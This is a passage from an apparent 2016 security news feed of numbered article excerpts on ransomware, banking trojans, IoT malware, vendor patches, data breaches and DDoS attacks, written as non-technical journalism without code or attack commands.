The vulnerability allows an attacker who has a man-in-the-middle position and is able to obtain a forged certificate to impersonate Mozilla servers, Tor officials warned in an advisory. From there, the attacker could deliver a malicious update for NoScript or many other Firefox extensions installed on a targeted computer. The fraudulent certificate would have to be issued by any one of several hundred Firefox-trusted certificate authorities (CA).

While it probably would be challenging to hack a CA or trick one into issuing the necessary certificate for addons.mozilla.org, such a capability is well within reach of nation-sponsored attackers, who are precisely the sort of adversaries included in the Tor threat model. In 2011, for instance, hackers tied to Iran compromised Dutch CA DigiNotar and minted counterfeit certificates for more than 200 addresses, including Gmail and the Mozilla addons subdomain.
#1472 ORWL PC: The most secure home computer ever
We’ve all heard tales of foreign intelligence entities breaking into hotel rooms and cloning a person’s hard drive while he or she is in the bar downstairs.

You might dismiss it as the stuff of urban legend or Jason Bourne movies, but this style of attack does highlight one of the most basic weaknesses of today’s PCs: Their data is extremely vulnerable once an attacker has physical access to a machine. Cold boot attacks, USB exploits,or DMA attacks over FireWire, among other breaches, are all possible if a bad actor can get his or her hands on the hardware.
#1471 Structure Security: How much security can you automate?
Security talent is hard to find and enterprises are falling over each other to hire people to defend their infrastructure, applications and data.

Meanwhile, universities are adding cybersecurity programs, but not a pace that'll make much of a dent into the talent shortage.

Can artificial intelligence and automation help the security cause?

Most likely. The security intersection between artificial intelligence, automation and the labor pool will be front and center at the Structure Security conference kicking off next Tuesday, Sept. 27. I'm moderating a talk with Jay Leek, Chief Information Security Officer at Blackstone, the massive private equity firm.
#1470 Fooling the ‘Smart City’
The concept of a smart city involves bringing together various modern technologies and solutions that can ensure comfortable and convenient provision of services to people, public safety, efficient consumption of resources, etc. However, something that often goes under the radar of enthusiasts championing the smart city concept is the security of smart city components themselves. The truth is that a smart city’s infrastructure develops faster than security tools do, leaving ample room for the activities of both curious researchers and cybercriminals.
#1469 Someone is learning how to take down the Internet
Over the past year or two, someone has been probing the defenses of the companies that run critical pieces of the Internet. These probes take the form of precisely calibrated attacks designed to determine exactly how well these companies can defend themselves, and what would be required to take them down. We don't know who is doing this, but it feels like a large a large nation state. China and Russia would be my first guesses.

First, a little background. If you want to take a network off the Internet, the easiest way to do it is with a distributed denial-of-service attack (DDoS). Like the name says, this is an attack designed to prevent legitimate users from getting to the site. There are subtleties, but basically it means blasting so much data at the site that it's overwhelmed. These attacks are not new: hackers do this to sites they don't like, and criminals have done it as a method of extortion. There is an entire industry, with an arsenal of technologies, devoted to DDoS defense. But largely it's a matter of bandwidth. If the attacker has a bigger fire hose of data than the defender has, the attacker wins.
#1468 BkSoD by ransomware: HDDCryptor uses commercial tools to encrypt network shares and lock HDDs
While most ransomware we’ve seen only target specific file types or folders stored on local drives, removable media and network shares, we were able to uncover a ransomware family that does not discriminate: HDDCryptor. Detected as Ransom_HDDCRYPTOR.A, HDDCryptor not only targets resources in network shares such as drives, folders, files, printers, and serial ports via Server Message Block (SMB), but also locks the drive. Such a damaging routine makes this particular ransomware a very serious and credible threat not only to home users but also to enterprises.
#1467 Pay-to-click ad service hacked, 6.6M plaintext passwords dumped
How would you like to earn money just by sitting at home in front of a computer and viewing ads?

Us neither.

What if you could earn $1.20 an hour?

We’re not sure how you’d manage to cover the costs of your internet connection at that rate, but if you could somehow get online for free, and you were ready to work a solid 12 hours a day, 7 days a week, you could get out with close to $6000 a year.

In many parts of the world, that’s serious money, so we’re not surprised that people are willing to do it.

One online service that will pay you at that sort of rate is a company called ClixSense, which basically pays you for viewing ads, completing online surveys, categorising images or videos, making Google searches, and so on.

ClixSense also runs an affiliate network, so you can earn commission on the earnings of new members whom you bring to the party, as a way of keeping the ClixSense click-machine fuelled with clickers.
#1466 Cisco patches critical WebEx meetings server vulnerability
Cisco warned customers of 12 vulnerabilities across its product line this week, including a critical vulnerability in the software that powers its conferencing product, WebEx Meetings Server.

The company stressed on Wednesday that version 2.6 of its WebEx Meetings Server is vulnerable to a remote command execution vulnerability. If exploited, the bug could enable an attacker to inject arbitrary commands on a system with elevated privileges.

The issue, the most pressing among all the fixes pushed by Cisco this week, stems from the insufficient sanitization of user-supplied data, according to an advisory published by the company on Wednesday. U.S. CERT also published an alert today with links to all 12 Cisco advisories.
#1465 Signal bug lets attackers tamper with encrypted messages—patch now
Signal, the mobile messaging app recommended by NSA leaker Edward Snowden and a large number of security professionals, just fixed a bug that allowed attackers to tamper with the contents of encrypted messages sent by Android users.

The authentication-bypass vulnerability was one of two weaknesses found by researchers Jean-Philippe Aumasson and Markus Vervier in an informal review of the Java code used by the Android version of Signal. The bug made it possible for attackers who compromised a Signal server or were otherwise able to monitor data passing between Signal users to replace a valid attachment with a fraudulent one. A second bug possibly would have allowed attackers to remotely execute malicious code, but a third bug made limited exploits to a simple remote crash.

"The results are not catastrophic, but show that, like any piece of software, Signal is not perfect," Aumasson wrote in an e-mail. "Signal drew the attention of many security researchers, and it's impressive that no vulnerability was ever published until today. This pleads in favor of Signal, and we'll keep trusting it."
#1464 Neverquest trojan gets big summer update
The once prolific bank Trojan Neverquest has received a major code revamp over the summer and is now armed with modifications that can more adeptly hijack a victim’s PC, inject code into webpages and steal credentials. The update represents a significant enough change to the malware that researchers have dubbed the latest samples Neverquest2.

Over the past several months Arbor Networks’ Security Engineering and Response Team (ASERT), along other members of the security research community, have been tracking the slow and steady improvements added to Neverquest. There is consensus that the team behind the Trojan is gearing up for a new Neverquest2 assault.
#1463 Ransomware getting more targeted and expensive
I shared a meal not long ago with a source who works at a financial services company. The subject of ransomware came up and he told me that a server in his company had recently been infected with a particularly nasty strain that spread to several systems before the outbreak was quarantined. He said the folks in finance didn’t bat an eyelash when asked to authorize several payments of $600 to satisfy the Bitcoin ransom demanded by the intruders: After all, my source confessed, the data on one of the infected systems was worth millions — possibly tens of millions — of dollars, but for whatever reason the company didn’t have backups of it.

This anecdote has haunted me because it speaks volumes about what we can likely expect in the very near future from ransomware — malicious software that scrambles all files on an infected computer with strong encryption, and then requires payment from the victim to recover them.
#1462 DualToy Windows trojan attacks Android and iOS Devices
A Windows Trojan called DualToy has been discovered that can side load malicious apps onto Android and iOS devices via a USB connection from an infected computer.

Researchers from Palo Alto Networks said DualToy has been in existence since January 2015, and it originally was limited to installing unwanted apps and displaying mobile ads on Android devices. About six months later, the Trojan morphed and began targeting iOS devices by installing a third-party App Store in hopes of nabbing iTunes usernames and passwords.

When DualToy began to spread in January 2015, it was only capable of infecting Android devices… We observed the first sample of DualToy capable of infecting iOS devices on June 7, 2015. Later in 2016, a new variant appeared,” wrote senior malware researcher Claud Xiao in a technical description of the Trojan.
#1461 Google is giving you $200,000 to hack the Nexus 6P and 5X
If you’ve always wanted to get into hacking, now’s the time.

Today Google is launching the Project Zero Security Contest and awarding over $300,000 in prizes to anyone who can hack Nexus 6P and 5X knowing only the devices’ phone number and email address.
#1460 Hackers found 47 new vulnerabilities in 23 IoT devices at DEF CON
Smart door locks, padlocks, thermostats, refrigerators, wheelchairs and even solar panel arrays were among the internet-of-things devices that fell to hackers during the IoT Village held at the DEF CON security conference in August.

A month after the conference ended, the results are in: 47 new vulnerabilities affecting 23 devices from 21 manufacturers were disclosed during the IoT security talks, workshops and onsite hacking contests.

The types of vulnerabilities found ranged from poor design decisions like the use of plaintext and hard-coded passwords to coding flaws like buffer overflows and command injection.

Door locks and padlocks from vendors like Quicklock, iBlulock, Plantraco, Ceomate, Elecycle, Vians, Lagute, Okidokeys, Danalock were found to be vulnerable to password sniffing and replay attacks, where a captured command can be replayed later to open the locks.

A wheelchair from an unknown vendor had a vulnerability that could be exploited to disable a safety feature and take control of the device. A thermostat from Trane used a weak plain text protocol potentially allowing attackers to cause excessive heating, furnace failures or frozen water pipes by manipulating thermostat functionality.
#1459 iOS 10 security updates move to HTTPS
Apple has finally moved its iOS security update mechanism to HTTPS with today’s release of iOS 10.

Previously, updates were sent to devices over HTTP and attackers already present on a network could potentially intercept and manipulate updates.

“An issue existed in iOS updates, which did not properly secure user communications. This issue was addressed by using HTTPS for software updates,” Apple said in its advisory, adding that a man-in-the-middle attacker could block devices from receiving updates.
#1458 Microsoft patches 47 vulnerabilities with September Patch Tuesday
Microsoft patched 47 vulnerabilities as part of 14 security bulletins, seven critical, with its monthly Patch Tuesday updates today.

The company is warning users that if left unpatched, 10 of the issues can lead to remote execution.

The updates resolve issues in Microsoft Windows, Office, Office Service and Web Apps, Exchange, its Internet Explorer and Edge browsers and Adobe Flash Player.

Among the bugs fixed on Tuesday is a 10-year-old vulnerability, CVE-2016-0137, that existed in Detours, Microsoft Office’s hooking engine. The bug, disclosed over the summer and discussed in depth at Black Hat, affected a handful antivirus platforms that use code hooking. The vulnerability allowed hackers to bypass exploit mitigations present in Windows and those third party applications. Researchers at enSilo, who unearthed the bug, disclosed it to Microsoft nine months ago, prior to Black Hat. At the time the researchers warned that hundreds of thousands of users could be affected by the vulnerability.
#1457 UK: Government data security slammed in new report
The National Audit Office has issued a damning report of the UK government's approach to digital security.

The central teams and departments dedicated to protecting information were found to be operating without cohesion and governance.

There are 73 teams and 1,600 staff across government with data security responsibilities.

However there was a lack of awareness among staff about who to contact for guidance, the NAO said.

"None of the departments we interviewed understood the specific roles of the various bodies involved, making it difficult to identify any single arbiter of standards or guidance," the report stated.
#1456 Secret Service warns of ‘Periscope’ skimmers
The U.S. Secret Service is warning banks and ATM owners about a new technological advance in cash machine skimming known as “periscope skimming,” which involves a specialized skimming probe that connects directly to the ATM’s internal circuit board to steal card data.

According to a non-public alert released to bank industry sources by a financial crimes task force in Connecticut, this is thought to be the first time periscope skimming devices have been detected in the United States. The task force warned that the devices may have the capability to remain powered within the ATM for up to 14 days and can store up to 32,000 card numbers before exhausting the skimmer’s battery strength and data storage capacity.

The alert documents the first known case of periscope skimming in the United States, discovered Aug. 19, 2016 at an ATM in Greenwich, Conn. A second periscope skimmer was reportedly found hidden inside a cash machine in Pennsylvania on Sept. 3.
#1455 Adblock Plus finds the end-game of its business model: Selling ads
Eyeo GmbH, the company that makes the popular Adblock Plus software, will today start selling the very thing many of its users hate—advertisements. Today, the company is launching a self-service platform to sell "pre-whitelisted" ads that meet its "acceptable ads" criteria. The new system will let online publishers drag and drop advertisements that meet Eyeo's expectations for size and labeling.

"The Acceptable Ads Platform helps publishers who want to show an alternative, nonintrusive ad experience to users with ad blockers by providing them with a tool that lets them implement Acceptable Ads themselves,” said Till Faida, co-founder of Adblock Plus.

Publishers who place the ads will do so knowing that they won't be blocked by most of the 100 million Adblock Plus users. The software extension's default setting allows for "acceptable ads" to be shown, and more than 90 percent of its users don't change that default setting.
#1454 Generic OSX malware detection method explained
When it comes to detecting OS X malware, the future may not be rooted in machine learning algorithms, but patterns and heatmap visualization, a researcher posits.

In an academic paper published by Virus Bulletin on Monday, Vincent Van Mieghem, a former student at the Delft University of Technology in the Netherlands, describes how a recurring pattern he observed in OS X system calls can be used to indicate the presence of malware.

Van Mieghem wrote the paper, “Behavioral Detection and Prevention of Malware on OS X,” (.PDF) while interning at Fox-IT but has since moved on to PricewaterhouseCoopers’ cybersecurity division.
#1453 Gugi: from an SMS trojan to a mobile-banking trojan
The mobile-banking Trojan family, Trojan-Banker.AndroidOS.Gugi is interesting due to its use of the WebSocket protocol to interact with its command-and-control servers. This protocol combines the advantages of HTTP with those of commonly used sockets: there is no need to open extra ports on a device, as all the communication goes through standard port 80. At the same time, real-time data exchange is possible.

It is worth noting that even though this technology is user-friendly, it is not that popular among attackers. Among all the mobile Trojans that utilize WebSocket technology, more than 90% are related to the Gugi family.
#1452 How a third-party App Store abuses Apple’s developer enterprise program to serve adware
For bogus applications to be profitable, they should be able to entice users into installing them. Scammers do so by riding on the popularity of existing applications, embedding them with unwanted content—even malicious payloads—and masquerading them as legitimate. These repackaged apps are peddled to unsuspecting users, mostly through third-party app stores.

Haima exactly does that, and more. We discovered this China-based third-party iOS app store aggressively promoting their repackaged apps in social network channels—YouTube, Facebook, Google+, and Twitter—banking on the popularity of games and apps such as Minecraft, Terraria, and Instagram to lure users into downloading them.

Third-party app stores such as Haima rely on the trust misplaced not only by the users but also by distribution platforms such as Apple’s, whose Developer Enterprise Program is abused to deploy these repackaged apps. These marketplaces also appeal to the malefactors because they are typically less policed. Haima capitalizes on the monetization of ads that it unscrupulously pushes to its repackaged apps.
#1451 Hands-on: Blue Hydra can expose the all-too-unhidden world of Bluetooth
My new neighbor was using AirDrop to move some files from his phone to his iMac. I hadn't introduced myself yet, but I already knew his name. Meanwhile, someone with a Pebble watch was walking past, and someone named "Johnny B" was idling at the stoplight at the corner in their Volkswagen Beetle, following directions from their Garmin Nuvi. Another person was using an Apple Pencil with their iPad at a nearby shop. And someone just turned on their Samsung smart television.

I knew all this because each person advertised their presence wirelessly, either over "classic" Bluetooth or the newer Bluetooth Low Energy (BTLE) protocol—and I was running an open source tool called Blue Hydra, a project from the team at Pwnie Express. Blue Hydra is intended to give security professionals a way of tracking the presence of traditional Bluetooth, BTLE devices, and BTLE "iBeacon" proximity sensors. But it can also be connected to other tools to provide alerts on the presence of particular devices.
#1450 Allow web domain changeover: US tech firms
Major technology companies including Facebook, Google, and Twitter are urging United States Congress to support a plan for the government to cede control of the internet's technical management to the global community.

The US Commerce Department has primary oversight of the internet's management, but some Republican lawmakers are trying to block the handover to global stakeholders, which include businesses, tech experts, and public interest advocates, saying it could stifle online freedom by giving voting rights to authoritarian governments.

The years-long plan to transfer oversight of the non-profit Internet Corporation for Assigned Names and Numbers (ICANN) is scheduled to occur on October 1, unless Congress votes to block the handover. The California-based corporation operates the database for domain names such as .com and .net and their corresponding numeric addresses that allow computers to connect.
#1449 Critical MySQL vulnerability disclosed
A researcher has published details and a limited proof-of-concept exploit for a critical vulnerability in MySQL that has been patched by some vendors, but not yet by Oracle.

The vulnerability allows an attacker to remotely or locally exploit a vulnerable MySQL database and execute arbitrary code, researcher Dawid Golunski of Legal Hackers wrote today in an advisory.

The flaw affects MySQL 5.7.15, 5.6.33 and 5.5.52. It has been patched in vendor deployments of MySQL in MariaDB and PerconaDB. Golunski said in his advisory that he reported the vulnerability to Oracle and other affected vendors on July 29. MariaDB and PerconaDB patched their versions of the database software before the end of August. Golunski said that since more than 40 days have passed and the two vendor fixes are public, he decided to disclose.
#1448 Fire drill knocks ING bank's data centre offline
A fire extinguisher test in a bank's data centre has gone wrong in an "unprecedented" manner, causing its cash machines, online banking operations and website to go offline.

For much of Saturday, ING's Romanian customers could not access their money.

The bank said the discharge of its gas-based fire suppression system had caused "unexpected" damage to its computer servers.

A report by Motherboard suggests that the equipment was too noisy.

A spokeswoman for ING was unable to confirm this detail.

But she did acknowledge the problem had lasted from 13:00 to 23:00 local time and the bank had been unable to explain the situation to customers as its own communications system had been affected.
#1447 Cisco’s network bugs are front and center in bankruptcy fight
Game of War: Fire Age, your typical melange of swords and sorcery, has been one of the top-grossing mobile apps for three years, accounting for hundreds of millions of dollars in revenue. So publisher Machine Zone was furious when the game’s servers, run by hosting company Peak Web, went dark for 10 hours last October. Two days later, Machine Zone fired Peak Web, citing multiple outages, and later sued.

Then came the countersuit. Peak Web argued in court filings that Machine Zone was voiding its contract illegally, because the software bug that caused the game outages resided in faulty network switches made by Cisco Systems, and according to Peak Web’s contract with Machine Zone, it wasn’t liable. In December, Cisco publicly acknowledged the bug’s existence—too late to help Peak Web, which filed for bankruptcy protection in June, citing the loss of Machine Zone’s business as the reason. The Machine Zone-Peak Web trial is slated for March 2017.
#1446 Now you can buy a USB stick that destroys anything in its path
For just a few bucks, you can pick up a USB stick that destroys almost anything that it's plugged into. Laptops, PCs, televisions, photo booths -- you name it.

Once a proof-of-concept, the pocket-sized USB stick now fits in any security tester's repertoire of tools and hacks, says the Hong Kong-based company that developed it. It works like this: when the USB Kill stick is plugged in, it rapidly charges its capacitors from the USB power supply, and then discharges -- all in the matter of seconds.

On unprotected equipment, the device's makers say it will "instantly and permanently disable unprotected hardware".
#1445 Two critical bugs and more malicious apps make for a bad week for Android
It was a bad week for millions of Android phone users. Two critical vulnerabilities were disclosed but remain unpatched in a large percentage of devices, while, separately, malicious apps were downloaded as many as 2.5 million times from Google's official Play Marketplace.

The vulnerabilities, which are similar in severity to the Stagefright family of bugs disclosed last year, have been fixed in updates Google began distributing Tuesday. A large percentage of Android phones, however, aren't eligible to receive the fixes. Even those that do qualify don't receive them immediately (the September updates are currently not available as over-the-air downloads for either of the Nexus 5X devices in my household). That gives attackers crude blueprints for exploiting vulnerabilities that remain unpatched on millions of devices.
#1444 Re-thinking security fundamentals: How to move beyond the FUD
Around ten years ago, a new movement spread throughout computing: design thinking. It seems so obvious in hindsight, but the notion that the user experience presented by your product was something that had to be considered and prioritized at every step -- instead of layered on at the end -- was revolutionary at the time.

It's long past time for a similar type of movement: security thinking.

For far too long, security has been an afterthought in the product development process. Passwords are stored in plain text at companies with hundreds of millions of users; people have proven time and time again that they will click on a link that seems so obviously suspicious; the most common password is, well, "password"; and large companies with tons of internal and external applications focus on plugging holes in the walls while attackers parachute into their networks. These aren't technical challenges; they are cultural challenges born of the obsession to rush products to market in search of rapid growth, or to hire a passel of security consultants who recommend layers of security products that cost more every year.
#1443 Blue light has a dark side
Exposure to blue light at night, emitted by electronics and energy-efficient lightbulbs, harmful to your health.

blue light at night is harmful to your healthUntil the advent of artificial lighting, the sun was the major source of lighting, and people spent their evenings in (relative) darkness. Now, in much of the world, evenings are illuminated, and we take our easy access to all those lumens pretty much for granted.

But we may be paying a price for basking in all that light. At night, light throws the body's biological clock—the circadian rhythm—out of whack. Sleep suffers. Worse, research shows that it may contribute to the causation of cancer, diabetes, heart disease, and obesity.
#1442 Cryptocurrency mining malware discovered targeting Seagate NAS hard drives
A malware variant named Mal/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency.

Miner-C, or PhotoMiner, appeared at the start of June 2016, when a report revealed how this malware was targeting FTP servers and spreading on its own to new machines thanks to worm-like features that attempted to brute-force other FTP servers using a list of default credentials.
#1441 MalwareMustDie spotted a new ELF trojan backdoor, which is now targeting IoT devices
Experts from MalwareMustDie have analyzed in August samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices. The name of the malware is the same of the binary,”mirai.*,” and according to the experts, several attacks have been detected in the wild.

The ELF Linux/Mirai is very insidious; it is still undetected by many antivirus solutions as confirmed by the very low detection ratio in the VirusTotal online scanning service.

“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming.” states the analysis from MalwareMustDie Blog.
#1440 Wordpress urges users to update now to fix critical security holes
Wordpress is urging webmasters to update their CMS packages as quickly as possible to protect their domains from critical vulnerability exploits.

On Thursday, the content management system (CMS) provider released a security advisory alongside the latest version of Wordpress, 4.6.1. Now available, the update patches two serious security problems, a cross-site scripting vulnerability and a path traversal security flaw.

The XSS flaw, discovered by SumOfPwn researcher Cengiz Han back in July at the Summer of Pwnage bug bounty project, allows attackers to use a crafted image file, upload to Wordpress, and inject malicious JavaScript code into the software.
#1439 Picture perfect: CryLocker ransomware uploads user information as PNG files
Taking advantage of legitimate sites for command-and-control (C&C) purposes is typically done by most malware to avoid rousing suspicion from their targets. While most ransomware directly sends the gathered information to their designated C&C servers, there are some variants that slightly differ. CuteRansomware, for instance, uses Google Docs to pass information from the infected system to the attackers.

One of the latest ransomware families, CryLocker (detected as RANSOM_MILICRY.A), does the same by taking advantage of Imgur, a free online image hosting site that allows users to upload and share photos to their contacts. During our monitoring of activities related to exploit kits, we spotted both Rig and Sundown distributing this threat.
#1438 WordPress update eesolves XSS, path traversal vulnerabilities
WordPress is strongly encouraging users of the content management system to update to the most recent version, 4.6.1, released on Wednesday.

The update addresses two separate security issues, a cross-site scripting vulnerability and a path traversal vulnerability.

The XSS vulnerability, discovered by Cengiz Han Sahin, co-founder of Dutch software security firm Securify, could be executed via image filename.
#1437 Israeli online attack service ‘vDOS’ earned $600,000 in two years
vDOS — a “booter” service that has earned in excess of $600,000 over the past two years helping customers coordinate more than 150,000 so-called distributed denial-of-service (DDoS) attacks designed to knock Web sites offline — has been massively hacked, spilling secrets about tens of thousands of paying customers and their targets.

The vDOS database, obtained by KrebsOnSecurity.com at the end of July 2016, points to two young men in Israel as the principal owners and masterminds of the attack service, with support services coming from several young hackers in the United States.
#1436 Two-thirds of companies pay ransomware demands: But not everyone gets their data back
The majority of organisations which become infected by ransomware will give into the demands of cybercriminals for reasons ranging from the importance of the encrypted data to the perceived low costs of ransom payments.

However, some companies have discovered the hard way that cybercriminals are not to be trusted, with many only paying hackers to unencrypt their files only to find that they never get their data back.

The figures on reactions to ransomware from Trend Micro come following a surge in cyberattacks using the file encrypting malicious software over the last year which has resulted in it becoming the largest threat to cybersecurity, as demonstrated by some cases of Locky infections against high-profile targets.
#1435 Google shuts down potentially massive Android bug
The Android ecosystem may have dodged another Stagefright-type of vulnerability.

Google’s monthly Android Security Bulletin released on Tuesday not only patched the remaining Quadrooter vulnerabilities, but also fixed another wide-ranging flaw that could allow an attacker to easily compromise—or at least brick—any Android device dating back to version 4.2.

The key to staving off another Stagefright is that yesterday’s patch features a complete overhaul of the offending jhead library, mitigating the possibility of recurring critical bugs, which, for example, continue to plague Mediaserver on an almost-monthly basis.
#1434 The missing piece – sophisticated OSX backdoor discovered
Back in January this year we found a new family of cross-platform backdoors for desktop environments. After the discovery of the binaries for Linux and Windows systems, we have now finally come across the OS X version of Mokes.A. It is written in C++ using Qt, a cross-platform application framework, and is statically linked to OpenSSL. This leads to a filesize of approx. 14MB.
#1433 This nasty Android malware tries to bully its way past Marshmallow security features
The battle between hackers and mobile security continues as cybercriminals attempt to find a way around the tighter app security introduced with Android 6.0.

Kaspersky Lab is warning of a modification to the Gugi banking trojan that tries to force its way past new Android 6.0 Marshmallow security features designed to block phishing and ransomware attacks.

The company said the malware forces users into giving it the right to lay a new interface on top of those used by genuine apps, send and view SMS, make calls, and more. Kaspersky said between April and early August this year there was a ten-fold increase in its number of victims.
#1432 Million more devices sharing known private keys for HTTPS, SSH admin
Millions of internet-facing devices – from home broadband routers to industrial equipment – are still sharing well-known private keys for encrypting their communications.

This is according to research from SEC Consult, which said in a follow-up to its 2015 study on security in embedded systems that the practice of reusing widely known secrets is continuing unabated.

Devices and gadgets are still sharing private keys for their builtin HTTPS and SSH servers, basically. It is not difficult to extract these keys from the gizmos and use them to eavesdrop on encrypted connections and interfere with the equipment: imagine intercepting a connection to a web-based control panel, decrypting it, and altering the configuration settings on the fly. And because so many models and products are using the same keys, it's possible to attack thousands of boxes at once.

SEC Consult senior security consultant Stefan Viehböck scanned the public internet and found that the practice of using known private keys has increased over the past nine months, with the number of net-accessible vulnerable devices ballooning to more than 4.5 million network appliances, IoT devices, and embedded systems around the world. That's up 40 per cent, or 1.3 million, from November, according to SEC Consult.
#1431 Modified USB ethernet adapter can steal Windows and Mac credentials
Security researcher Rob Fuller has discovered a unique attack method that can steal PC credentials from Windows and Mac computers, and possibly Linux (currently untested).

Fuller's attack is effective against locked computers on which the user has already logged in.

The researcher used USB-based Ethernet adapters, for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it's connected to.

The attack is possible because most computers will automatically install any plug-and-play (PnP) USB device.

"Why does this work? Because USB is Plug-and-Play. This means that even if a system is locked out, the device still gets installed," Fuller explained.

"Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list."
#1430 Critical flaws found in network management systems
Eleven critical vulnerabilities have been patched in network management systems (NMS) from four leading manufacturers: Cloudview, Netikus, Paessler and Opmantek. The flaws enable remote cross-site scripting and command-injection attacks.

Public disclosure of the vulnerabilities coincided with a technical description by Rapid7 released Wednesday; the research compliments earlier work on similar bugs found in 2015.

Each of the 11 vulnerabilities varied widely, however they shared the common technique allowing for the injection of malicious packets via Simple Network Management Protocol (SNMP) to gain control of NMS web console browser windows, said Tod Beardsley, principal security research manager at Rapid7 in a blog post.
#1429 "Catastrophic" DDoS attack pummels Linode servers over labor day weekend
Linode, one of the world's top providers of virtual private servers (VPS), battled over the weekend with a DDoS attack that targeted its Atlanta data center and that the company has described as "catastrophic."

The attack, aimed at the company's Atlanta data center, started on Saturday, September 3, around 21:00 UTC, and got the Linode team scrambling for answers.

Three and a half hours later, Linode engineers were informing customers that they experienced "a catastrophic DDoS attack which is being spread across hundreds of different IP addresses in rapid succession, making mitigation extremely difficult."

During all this time, connectivity to the service was down, affecting Linode customers such as Clojars, a repository of open source Clojure libraries that relies on the Linode infrastructure.

The attack started subsiding by Monday, September 5, around 21:30 UTC. The attack's start and end date were perfectly timed to fit the US Labor Day extended holiday weekend.
#1428 Cry ransomware uses UDP, Imgur, Google Maps
Ransomware purporting to come from a phony government agency, something called the Central Security Treatment Organization, has been making the rounds, researchers say.

The ransomware, which is already known by a number of names including Cry, CSTO ransomware, or Central Security Treatment Organization ransomware, uses the User Datagram Protocol (UDP) to communicate and the photo sharing service Imgur and Google Maps to carry out its infections to an extent, as well.

A security researcher who goes under the guise MalwareHunterTeam discovered the malware last Thursday.
#1427 Hackers “find Twitter exploit” and resurrect banned accounts
This should be a Halloween tale: Twitter accounts long dead and buried have been resurrected by a Frankenstein-like bunch of hackers.

We don’t know where they got the jolt of lightning to make these things burst from the grave, but as Business Insider reports, a hacking group calling itself Spain Squad allegedly seized Twitter accounts including @Hell, @Hitler, @Nazi, @ak47, and @1337: many of which had been previously suspended, while others had been inactive for quite some time.

The @Ziter account, claiming affiliation with Spain Squad, on Friday was offering a slew of accounts for sale, including those above as well as @botnet, @darknet, @LizardSquad, and @bypass.

As of Monday morning, Twitter hadn’t commented, though it had reburied the zombie accounts, suspending them yet again.
#1426 Google fixes final 'Quadrooter' flaws with new security patch
What took Google a month to fix took others just a couple of weeks.

In the latest round of Android security fixes released Tuesday, the company fixed two remaining flaws that were part of the so-called "Quadrooter" set of vulnerabilities announced last month.

Quadrooter was particularly troublesome because the set of four flaws (hence the name "quad") affected at least 900 million Android devices. These high-risk vulnerabilities would allow a dedicated and well-trained attacker to gain complete access to an affected phone and its data.
#1425 Banking trojan, Gugi, evolves to bypass Android 6 protection
Almost every Android OS update includes new security features designed to make cybercriminals’ life harder. And, of course, the cybercriminals always try to bypass them.

We have found a new modification of the mobile banking Trojan, Trojan-Banker.AndroidOS.Gugi.c that can bypass two new security features added in Android 6: permission-based app overlays and a dynamic permission requirement for dangerous in-app activities such as SMS or calls. The modification does not use any vulnerabilities, just social engineering.
#1424 Russian internet giant Rambler.ru hacked, leaking 98 million accounts
Russian internet portal and email provider Rambler.ru has become the latest victim in a growing list of historical hacks.

Breach notification site LeakedSource.com, which obtained a copy of an internal customer database, said the attack dates back to February 17, 2012.

More than 98.1 million accounts were in the database, including usernames, email addresses, social account data, and passwords, the group said in a blog post. Unlike other major breaches, those passwords were stored in unencrypted plaintext, meaning anyone at the company could easily see passwords.

The last time a breach on this scale was found using plaintext password storage was Russian social networking site VK.com, which saw 171 million accounts taken in the breach.
#1423 Pokémon-themed umbreon Linux rootkit hits x86, ARM systems
The Trend Micro Forward Looking Threat Research team recently obtained samples of a new rootkit family from one of our trusted partners. We are providing a detailed analysis of the rootkit, and also making the samples available to the industry to help others block this threat.

This rootkit family called Umbreon (sharing the same name as the Pokémon) targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well. (An aside: the rootkit does appear to be named after the Pokémon of the same name. This Pokémon is known for hiding in the night, which is an appropriate characteristic for a rootkit.) We detect Umbreon under the ELF_UMBREON family.
#1422 Google Chrome fixes serious vulnerabilities, thanks to bug fighters
The latest Google Chrome browser update comes with 33 vulnerability patches, including 13 that are high-severity. It’s all thanks to community contributors and bug fighters who submitted fixes for Chrome’s bug bounty program.

Many of the vulnerabilities fixed in this release were part of the browser’s engine Blink, but some of the more high-severity discoveries were for Chrome’s built-in PDF reader, PDFium.

This big rollout of bug fixes follows another busy month, where 48 vulnerabilities were patched in July alone. Some of the bug bounty contributors netted themselves quite a bit of cash too, up to $7,500 per cross-site scripting bug caught.
#1421 German spies violated law, must delete XKeyscore database - watchdog
Germany's spies seriously violated the country's laws multiple times, according to a secret report from its federal data protection commissioner Andrea Voßhoff.

The legal analysis, leaked to Netzpolitik, was made in July 2015 following a visit by data protection officials to Bad Aibling in southern Germany, in the wake of Edward Snowden's revelations about surveillance activities there. Bad Aibling is jointly run by Germany's intelligence agency, the Bundesnachrichtendienst (BND), and the NSA.

As well as listing 18 serious legal violations, and filing 12 formal complaints—the German data watchdog's most severe legal instrument—the secret report said that the BND created seven databases without the appropriate legal approval. As a result, commissioner Voßhoff said that all seven databases should be deleted, and could not be used again.
#1420 Police seize two Perfect Privacy VPN servers
A few days ago the company informed its customers that two of its servers had been seized by the police in Rotterdam, Netherlands. The authorities went directly to the hosting company I3D and the VPN provider itself wasn’t contacted by law enforcement.

“Currently we have no further information since the responsible law enforcement agency did not get in touch with us directly, we were merely informed by our hoster,” Perfect Privacy says.

Despite losing control over two servers, Perfect Privacy assures its customers that no personally identifiable data is present on the seized hardware. Like many other VPNs, the company maintains a strict no-logging policy.

“Since we are not logging any data there is currently no reason to believe that any user data was compromised,” the VPN provider says.
#1419 US would be 28th In 'Hacking Olympics', China would take the gold
Which countries have the best programmers in the world?

Many would assume it’s the United States. After all, the United States is the home of programming luminaries such as Bill Gates, Ken Thompson, Dennis Ritchie, and Donald Knuth. But then again, India is known as the fastest growing concentration of programmers in the world and the hackers from Russia are apparently pretty effective. Is there any way to determine which country is best?

